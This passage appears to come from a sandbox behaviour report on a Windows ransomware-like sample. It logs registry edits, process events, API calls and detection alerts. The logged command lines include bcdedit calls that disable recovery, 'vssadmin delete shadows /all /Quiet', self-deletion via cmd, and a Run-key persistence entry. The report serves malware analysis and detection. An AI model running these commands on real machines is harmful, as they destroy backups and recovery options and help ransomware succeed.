  506. \Sessions\1\BaseNamedObjects\ZonesLockedCacheCounterMutex
  507.     2252         
  508. Regkey 
  509. Deleteval
  510.    
  511. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  512.    on\Internet Settings\ZoneMap\"ProxyBypass"
  513.     2252         
  514. Regkey 
  515. Deleteval
  516.    
  517. \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"P
  518.   roxyBypass"
  519.     2252         
  520. Regkey 
  521. Deleteval
  522.    
  523. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  524.    on\Internet Settings\ZoneMap\"IntranetName"
  525.     2252         
  526. Regkey 
  527. Deleteval
  528.    
  529. \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"I
  530.   ntranetName"
  531.     2252         
  532. Regkey 
  533. Setval
  534.    
  535. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  536.    on\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
  537.     2252         
  538. Regkey 
  539. Setval
  540.    
  541. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  542.   on\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
  543.     2252         
  544. Folder 
  545. Open
  546.    
  547. C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
  548.     2252         
  549. Process
  550. Started
  551.    
  552. C:\Windows\SysWOW64\cmd.exe
  553.   Parentname:  C:\Users\Administrator\AppData\Local\Temp\73.exe
  554.   Command Line:  "C:\Windows\system32\cmd.exe" /c DEL C:\Users\ADMINI~1\AppData\Local\Temp\73.exe
  555.   MD5:  ad7b9c14083b52bc532fba5948342b98
  556.   SHA1: ee8cbf12d87c4d388f09b4f69bed2e91682920b5
  557.     1748    2252    302592
  558. File   
  559. Failed
  560.    
  561. C:\Windows\SysWOW64\UI\SWDRM.DLL
  562.     2252         
  563. API Call   
  564.    
  565.   API Name:  GetSystemDirectoryW   Address:  0x77179cce
  566.   Params:  [0x2c1f6cc, 260]
  567.   Imagepath:  C:\Users\Administrator\AppData\Local\Temp\73.exe   DLL Name:  kernel32.dll
  568.     2252         
  569. File   
  570. Failed
  571.    
  572. C:\Windows\System32\WOW64LOG.DLL
  573.     1748         
  574. Process
  575. Terminated
  576.    
  577. C:\Users\Administrator\AppData\Local\Temp\73.exe
  578.   Parentname:  C:\Windows\explorer.exe
  579.   Command Line:  N/A
  580.     2252    1092     
  581. Regkey 
  582. Queryvalue
  583.    
  584. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  585.     1748         
  586. File   
  587. Delete
  588.    
  589. C:\Users\Administrator\AppData\Local\Temp\73.exe
  590.  MD5:  446071be407efeb4e0d7c83bb504774a
  591.  SHA1: ef06d2b504ce08b2d6570ca4b4f923a1ad428f7a
  592.     1748        400384
  593. Malicious  Alert   
  594. Self  Delete
  595.    
  596. Message:   Self deletion using batch file    Detail:   Process deleting itself using a batch file  
  597.              
  598. Malicious  Alert   
  599. Self  Delete
  600.    
  601. Message:   Root process deleted    Detail:   Process deleting itself  
  602.              
  603. Process
  604. Terminated
  605.    
  606. C:\Windows\SysWOW64\cmd.exe
  607.  Parentname:  C:\Users\Administrator\AppData\Local\Temp\73.exe
  608.  Command Line:  N/A
  609.     1748    2252     
  610. File   
  611. Failed
  612.    
  613. C:\Users\ADMINI~1\AppData\Local\Temp\A.CONFIG
  614.     328      
  615. File   
  616. Failed
  617.    
  618. C:\Users\ADMINI~1\AppData\Local\Temp\A
  619.     328      
  620. API Call   
  621.    
  622.  API Name:  Sleep   Address:  0x0042232d
  623.  Params:  [15]
  624.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  625.     328      
  626. File   
  627. Failed
  628.    
  629. C:\Users\Administrator\AppData\Roaming\MPR.DLL
  630.     328      
  631. Mutex  
  632.    
  633. \Sessions\1\BaseNamedObjects\DBWinMutex
  634.     328      
  635. File   
  636. Failed
  637.    
  638. C:\Windows\SysWOW64\RPCSS.DLL
  639.     328      
  640. API Call   
  641.    
  642.  API Name:  Sleep   Address:  0x0042232d
  643.  Params:  [15]
  644.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  645.     328      
  646. API Call   
  647.    
  648.  API Name:  Sleep   Address:  0x0042232d
  649.  Params:  [15]
  650.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  651.     328      
  652. 7 Repeated items skipped
  653. API Call   
  654.    
  655.  API Name:  GetSystemDirectoryW   Address:  0x7732f96e
  656.  Params:  [0x77396420, 260]
  657.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  658.     328      
  659. Mutex  
  660.    
  661. \Sessions\1\BaseNamedObjects\AMResourceMutex3
  662.     328      
  663. API Call   
  664.    
  665.  API Name:  NtAdjustPrivilegesToken   Address:  0x7584ca4f
  666.  Params:  [SeDebugPrivilege, Enabled]
  667.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  ntdll.dll
  668.     328      
  669. API Call   
  670.    
  671.  API Name:  GetTokenInformation   Address:  0x0041e934
  672.  Params:  [0x1bc, 0x19]
  673.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  advapi32.dll
  674.     328      
  675. API Call   
  676.    
  677.  API Name:  GetTokenInformation   Address:  0x0041e976
  678.  Params:  [0x1bc, 0x19]
  679.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  advapi32.dll
  680.     328      
  681. API Call   
  682.    
  683.  API Name:  Sleep   Address:  0x0042232d
  684.  Params:  [15]
  685.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  686.     328      
  687. API Call   
  688.    
  689.  API Name:  Sleep   Address:  0x0042232d
  690.  Params:  [15]
  691.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  692.     328      
  693. API Call   
  694.    
  695.  API Name:  Sleep   Address:  0x0042232d
  696.  Params:  [15]
  697.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  698.     328      
  699. File   
  700. Failed
  701.    
  702. C:\Users\Administrator\AppData\Roaming\DWMAPI.DLL
  703.     328      
  704. API Call   
  705.    
  706.  API Name:  Sleep   Address:  0x0042232d
  707.  Params:  [15]
  708.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  709.     328      
  710. File   
  711. Failed
  712.    
  713. C:\Users\Administrator\AppData\Roaming\MSVFW32.DLL
  714.     328      
  715. API Call   
  716.    
  717.  API Name:  Sleep   Address:  0x0042232d
  718.  Params:  [15]
  719.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  720.     328      
  721. File   
  722. Failed
  723.    
  724. C:\Users\Administrator\AppData\Roaming\PROFAPI.DLL
  725.     328      
  726. Mutex  
  727.    
  728. \Sessions\1\BaseNamedObjects\78456214324124
  729.     328      
  730. File   
  731. Failed
  732.    
  733. C:\Users\Administrator\AppData\Roaming\BCDEDIT.EXE
  734.     328      
  735. File   
  736. Failed
  737.    
  738. C:\Users\ADMINI~1\AppData\Local\Temp\bcdedit.exe
  739.     328      
  740. Process
  741. Started
  742.    
  743. C:\Windows\System32\bcdedit.exe
  744.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  745.  Command Line:  bcdedit.exe /set {current} bootems off
  746.  MD5:  780836bb63852990382df27de7fefd20
  747.  SHA1: 6feedabbc6576a4bdc68935677b7a01f130b98f2
  748.     848 328 346112
  749. Regkey 
  750. Queryvalue
  751.    
  752. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  753.     848      
  754. Regkey 
  755. Added
  756.    
  757. \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000020
  758.     848      
  759. Regkey 
  760. Setval
  761.    
  762. \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000020\"Elem
  763.    ent" = 00
  764.     848      
  765. Process
  766. Terminated
  767.    
  768. C:\Windows\System32\bcdedit.exe
  769.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  770.  Command Line:  N/A
  771.     848 328  
  772. API Call   
  773.    
  774.  API Name:  Sleep   Address:  0x0041df48
  775.  Params:  [1000]
  776.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  777.     328      
  778. Process
  779. Started
  780.    
  781. C:\Windows\System32\bcdedit.exe
  782.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  783.  Command Line:  bcdedit.exe /set {current} advancedoptions off
  784.  MD5:  780836bb63852990382df27de7fefd20
  785.  SHA1: 6feedabbc6576a4bdc68935677b7a01f130b98f2
  786.     1756    328 346112
  787. Regkey 
  788. Queryvalue
  789.    
  790. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  791.     1756         
  792. Regkey 
  793. Added
  794.    
  795. \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000040
  796.     1756         
  797. Regkey 
  798. Setval
  799.    
  800. \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000040\"Elem
  801.    ent" = 00
  802.     1756         
  803. Process
  804. Terminated
  805.    
  806. C:\Windows\System32\bcdedit.exe
  807.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  808.  Command Line:  N/A
  809.     1756    328  
  810. API Call   
  811.    
  812.  API Name:  Sleep   Address:  0x0041df48
  813.  Params:  [1000]
  814.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  815.     328      
  816. Process
  817. Started
  818.    
  819. C:\Windows\System32\bcdedit.exe
  820.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  821.  Command Line:  bcdedit.exe /set {current} optionsedit off
  822.  MD5:  780836bb63852990382df27de7fefd20
  823.  SHA1: 6feedabbc6576a4bdc68935677b7a01f130b98f2
  824.     3048    328 346112
  825. Regkey 
  826. Queryvalue
  827.    
  828. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  829.     3048         
  830. Regkey 
  831. Added
  832.    
  833. \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000041
  834.     3048         
  835. Regkey 
  836. Setval
  837.    
  838. \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000041\"Elem
  839.    ent" = 00
  840.     3048         
  841. Process
  842. Terminated
  843.    
  844. C:\Windows\System32\bcdedit.exe
  845.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  846.  Command Line:  N/A
  847.     3048    328  
  848. API Call   
  849.    
  850.  API Name:  Sleep   Address:  0x0041df48
  851.  Params:  [1000]
  852.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  853.     328      
  854. Process
  855. Started
  856.    
  857. C:\Windows\System32\bcdedit.exe
  858.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  859.  Command Line:  bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
  860.  MD5:  780836bb63852990382df27de7fefd20
  861.  SHA1: 6feedabbc6576a4bdc68935677b7a01f130b98f2
  862.     2604    328 346112
  863. Regkey 
  864. Queryvalue
  865.    
  866. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  867.     2604         
  868. Regkey 
  869. Added
  870.    
  871. \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\250000e0
  872.     2604         
  873. Regkey 
  874. Setval
  875.    
  876. \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\250000e0\"Elem
  877.    ent" = 01 00 00 00 00 00 00 00
  878.     2604         
  879. Process
  880. Terminated
  881.    
  882. C:\Windows\System32\bcdedit.exe
  883.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  884.  Command Line:  N/A
  885.     2604    328  
  886. API Call   
  887.    
  888.  API Name:  Sleep   Address:  0x0041df48
  889.  Params:  [1000]
  890.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  891.     328      
  892. Process
  893. Started
  894.    
  895. C:\Windows\System32\bcdedit.exe
  896.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  897.  Command Line:  bcdedit.exe /set {current} recoveryenabled off
  898.  MD5:  780836bb63852990382df27de7fefd20
  899.  SHA1: 6feedabbc6576a4bdc68935677b7a01f130b98f2
  900.     2548    328 346112
  901. Regkey 
  902. Queryvalue
  903.    
  904. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  905.     2548         
  906. Regkey 
  907. Setval
  908.    
  909. \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000009\"Elem
  910.    ent" = 00
  911.     2548         
  912. Process
  913. Terminated
  914.    
  915. C:\Windows\System32\bcdedit.exe
  916.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  917.  Command Line:  N/A
  918.     2548    328  
  919. API Call   
  920.    
  921.  API Name:  Sleep   Address:  0x0041df48
  922.  Params:  [1000]
  923.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  924.     328      
  925. Regkey 
  926. Added
  927.    
  928. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\zsys\
  929.     328      
  930. File   
  931. Failed
  932.    
  933. C:\Users\Administrator\AppData\Roaming\NETAPI32.DLL
  934.     328      
  935. File   
  936. Failed
  937.    
  938. C:\Users\Administrator\AppData\Roaming\NETUTILS.DLL
  939.     328      
  940. File   
  941. Failed
  942.    
  943. C:\Users\Administrator\AppData\Roaming\SRVCLI.DLL
  944.     328      
  945. File   
  946. Failed
  947.    
  948. C:\Users\Administrator\AppData\Roaming\WKSCLI.DLL
  949.     328      
  950. File   
  951. Failed
  952.    
  953. C:\Users\Administrator\AppData\Roaming\SCHEDCLI.DLL
  954.     328      
  955. API Call   
  956.    
  957.  API Name:  GetComputerNameExW   Address:  0x76e7ce4b
  958.  Params:  [0, 0x76f10a6c, 0x76f101c0]
  959.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  960.     328      
  961. API Call   
  962.    
  963.  API Name:  CryptAcquireContextW   Address:  0x0041baf8
  964.  Params:  [NULL, NULL, 1, 4026531840]
  965.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  advapi32.dll
  966.     328      
  967. File   
  968. Failed
  969.    
  970. C:\Users\Administrator\AppData\Roaming\CRYPTSP.DLL
  971.     328      
  972. API Call   
  973.    
  974.  API Name:  Process32First   Address:  0x0041bda4
  975.  Params:  [0x208, 0x18d448]
  976.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  977.     328      
  978. Malicious  Alert   
  979. Generic  Anomalous  Activity
  980.    
  981. Message:   Enumerating running processes    Detail:   Process is enumerating running processes  
  982.              
  983. Regkey 
  984. Setval
  985.    
  986. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\zsys\"ID" = e0 e6 ba c4 cd a3
  987.    3b b5
  988.     328      
  989. Regkey 
  990. Added
  991.    
  992. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\E0E6BAC4CDA33BB5
  993.     328      
  994. Regkey 
  995. Setval
  996.    
  997. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\E0E6BAC4CDA33BB5\"data" = 31 3
  998.   2 45 53 37 6e 48 6d 4c 58 35 76 75 4a 38 33 62 70 36 33 45 4d 66 6d 42 4d 74 50 4d 78 57 52 51 51
  999.    00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 3d cc a6 85 98 f4 57 66 ea b1 ca 98 a2 67 20 6d af
  1000.   5d 4f 5e 07 1e 38 8d 14 5a c3 24 34 66 c6 19 05 d5 02 34 fa 06 f0 c3 d6 41 ec 60 82 be cf c8 ef 6
  1001.   1 4a ae b0 e3 5a 15 69 19 0a 14 b7 9b fb 96 00 00 33 37 34 43 34 34 45 39 44 39 37 35 35 46 31 36
  1002.    44 45 37 39 39 37 35 38 30 41 30 45 32 31 38 32 34 37 43 42 41 30 37 46 36 34 36 44 35 39 33 36
  1003.   31 45 39 39 35 33 46 35 37 31 43 39 39 42 44 41 39 37 33 34 33 33 37 44 38 34 34 45 35 42 44 45 3
  1004.   9 31 37 36 31 34 32 45 41 33 45 41 45 33 35 42 32 34 42 35 44 37 33 34 45 31 46 46 37 33 31 33 38
  1005.    37 34 32 30 43 39 38 39 36 45 34 45 34 38 44 00 00 00 00 04 47 b3 b7 5e 96 25 0e e6 c3 17 17 24
  1006.   00 80 69 d2 b2 a9 7d ac 59 44 25 3f c3 ca 7a 8b 75 b2 84 6b 91 cd 9a 15 25 5e 8c 57 cb 21 1b c2 4
  1007.   9 db 51 85 52 5e 61 05 17 84 ee 4a c7 14 4b 33 d1 45 59 75 00 00 00 00 00 00 00 00 db 4d 61 56 00
  1008.    00 00 00
  1009.     328      
  1010. Regkey 
  1011. Setval
  1012.    
  1013. \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\"EnableLinkedConnections
  1014.   " = 0x00000001
  1015.     328      
  1016. Malicious  Alert   
  1017. Misc  Anom
  1018.    
  1019. Message:   Process deleting itself    Detail:   Process deleting itself in any manor  
  1020.              
  1021. Regkey 
  1022. Setval
  1023.    
  1024. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1025.    on\Run\"Acronis" = C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  1026.     328      
  1027. API Call   
  1028.    
  1029.  API Name:  CryptAcquireContextA   Address:  0x00412c1f
  1030.  Params:  [NULL, NULL, 1, 4026531840]
  1031.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  advapi32.dll
  1032.     328      
  1033. File   
  1034. Failed
  1035.    
  1036. C:\Users\Administrator\AppData\Roaming\PROPSYS.DLL
  1037.     328      
  1038. API Call   
  1039.    
  1040.  API Name:  GetSystemDirectoryW   Address:  0x75f92cf2
  1041.  Params:  [0x2aafa60, 260]
  1042.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  1043.     328      
  1044. API Call   
  1045.    
  1046.  API Name:  GetVolumeNameForVolumeMountPointW   Address:  0x76220aaa
  1047.  Params:  [NULL, \\?\Volume{a4dcb962-c2b8-11e2-8b83-806e6f6e6963}\]
  1048.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  1049.     328      
  1050. API Call   
  1051.    
  1052.  API Name:  GetSystemDirectoryW   Address:  0x743b56d4
  1053.  Params:  [0x2aaec30, 260]
  1054.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  1055.     328      
  1056. API Call   
  1057.    
  1058.  API Name:  GetSystemDirectoryW   Address:  0x743b56d4
  1059.  Params:  [0x2aaebf8, 260]
  1060.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  1061.     328      
  1062. API Call   
  1063.    
  1064.  API Name:  GetVolumeNameForVolumeMountPointW   Address:  0x76220aaa
  1065.  Params:  [NULL, \\?\Volume{a4dcb962-c2b8-11e2-8b83-806e6f6e6963}\]
  1066.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  1067.     328      
  1068. File   
  1069. Failed
  1070.    
  1071. C:\Users\ADMINI~1\AppData\Local\Temp\VSSADMIN.EXE
  1072.     328      
  1073. File   
  1074. Failed
  1075.    
  1076. C:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches
  1077.     328      
  1078. API Call   
  1079.    
  1080.  API Name:  GetSystemDirectoryW   Address:  0x77179cce
  1081.  Params:  [0x2d1f6cc, 260]
  1082.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  1083.     328      
  1084. File   
  1085. Failed
  1086.    
  1087. C:\Users\Administrator\AppData\Roaming\NTMARTA.DLL
  1088.     328      
  1089. File   
  1090. Failed
  1091.    
  1092. C:\Users\Administrator\AppData\Roaming\SECUR32.DLL
  1093.     328      
  1094. Mutex  
  1095.    
  1096. \Sessions\1\BaseNamedObjects\ZonesCacheCounterMutex
  1097.     328      
  1098. Regkey 
  1099. Deleteval
  1100.    
  1101. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1102.   on\Internet Settings\ZoneMap\"ProxyBypass"
  1103.     328      
  1104. Regkey 
  1105. Deleteval
  1106.    
  1107. \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"P
  1108.    roxyBypass"
  1109.     328      
  1110. Regkey 
  1111. Deleteval
  1112.    
  1113. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1114.   on\Internet Settings\ZoneMap\"IntranetName"
  1115.     328      
  1116. Regkey 
  1117. Deleteval
  1118.    
  1119. \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"I
  1120.    ntranetName"
  1121.     328      
  1122. Regkey 
  1123. Setval
  1124.    
  1125. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1126.   on\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
  1127.     328      
  1128. Regkey 
  1129. Setval
  1130.    
  1131. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1132.    on\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
  1133.     328      
  1134. Mutex  
  1135.    
  1136. \Sessions\1\BaseNamedObjects\ZonesLockedCacheCounterMutex
  1137.     328      
  1138. Regkey 
  1139. Deleteval
  1140.    
  1141. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1142.   on\Internet Settings\ZoneMap\"ProxyBypass"
  1143.     328      
  1144. Regkey 
  1145. Deleteval
  1146.    
  1147. \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"P
  1148.    roxyBypass"
  1149.     328      
  1150. Regkey 
  1151. Deleteval
  1152.    
  1153. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1154.   on\Internet Settings\ZoneMap\"IntranetName"
  1155.     328      
  1156. Regkey 
  1157. Deleteval
  1158.    
  1159. \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"I
  1160.    ntranetName"
  1161.     328      
  1162. Regkey 
  1163. Setval
  1164.    
  1165. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1166.   on\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
  1167.     328      
  1168. Regkey 
  1169. Setval
  1170.    
  1171. \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersi
  1172.    on\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
  1173.     328      
  1174. Folder 
  1175. Open
  1176.    
  1177. C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
  1178.     328      
  1179. File   
  1180. Created
  1181.    
  1182. C:\Users\Administrator\Documents\recover_file_brvwbqpck.txt
  1183.     328      
  1184. File   
  1185. Close
  1186.    
  1187. C:\Users\Administrator\Documents\recover_file_brvwbqpck.txt
  1188.  MD5:  ea9cb64cffd1adb09d964c1e202861d9
  1189.  SHA1: fe160fe8991773f9ca44999b34a398a5b32b0766
  1190.     328     254
  1191. Process
  1192. Started
  1193.    
  1194. C:\Windows\System32\vssadmin.exe
  1195.  Parentname:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  1196.  Command Line:  "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
  1197.  MD5:  e23dd973e1444684eb36365deff1fc74
  1198.  SHA1: 09fafeb1b8404124b33c44440be7e3fdb6105f8a
  1199.     2336    328 167424
  1200. File   
  1201. Failed
  1202.    
  1203. C:\Users\Administrator\AppData\Roaming\API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL
  1204.     328      
  1205. API Call   
  1206.    
  1207.  API Name:  Sleep   Address:  0x0041f00b
  1208.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  1209.     328      
  1210. File   
  1211. Open
  1212.    
  1213. C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
  1214.     328     128
  1215. Process
  1216. Opened
  1217.    
  1218.  
  1219. Target:   N/A    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1220.    
  1221. 4
  1222. 328
  1223.          
  1224. Process
  1225. Opened
  1226.    
  1227.  
  1228. Target:   C:\Windows\System32\smss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1229.    
  1230. 264
  1231. 328
  1232.          
  1233. Process
  1234. Opened
  1235.    
  1236.  
  1237. Target:   C:\Windows\System32\csrss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1238.    
  1239. 348
  1240. 328
  1241.          
  1242. Process
  1243. Opened
  1244.    
  1245.  
  1246. Target:   C:\Windows\System32\wininit.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1247.    
  1248. 376
  1249. 328
  1250.          
  1251. Process
  1252. Opened
  1253.    
  1254.  
  1255. Target:   C:\Windows\System32\csrss.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1256.    
  1257. 396
  1258. 328
  1259.          
  1260. Process
  1261. Opened
  1262.    
  1263.  
  1264. Target:   C:\Windows\System32\winlogon.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1265.    
  1266. 432
  1267. 328
  1268.          
  1269. Process
  1270. Opened
  1271.    
  1272.  
  1273. Target:   C:\Windows\System32\services.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1274.    
  1275. 476
  1276. 328
  1277.          
  1278. Process
  1279. Opened
  1280.    
  1281.  
  1282. Target:   C:\Windows\System32\lsass.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1283.    
  1284. 492
  1285. 328
  1286.          
  1287. Process
  1288. Opened
  1289.    
  1290.  
  1291. Target:   C:\Windows\System32\lsm.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1292.    
  1293. 500
  1294. 328
  1295.          
  1296. Process
  1297. Opened
  1298.    
  1299.  
  1300. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1301.    
  1302. 612
  1303. 328
  1304.          
  1305. Process
  1306. Opened
  1307.    
  1308.  
  1309. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1310.    
  1311. 684
  1312. 328
  1313.          
  1314. Process
  1315. Opened
  1316.    
  1317.  
  1318. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1319.    
  1320. 756
  1321. 328
  1322.          
  1323. Process
  1324. Opened
  1325.    
  1326.  
  1327. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1328.    
  1329. 828
  1330. 328
  1331.          
  1332. Process
  1333. Opened
  1334.    
  1335.  
  1336. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
  1337.    
  1338. 868
  1339. 328
  1340.          
  1341. Process
  1342. Opened
  1343.    
  1344.  
  1345. Target:   C:\Windows\System32\svchost.exe    Source:   C:\Users\Administrator\AppData\Roaming\icwyx-a.exe  
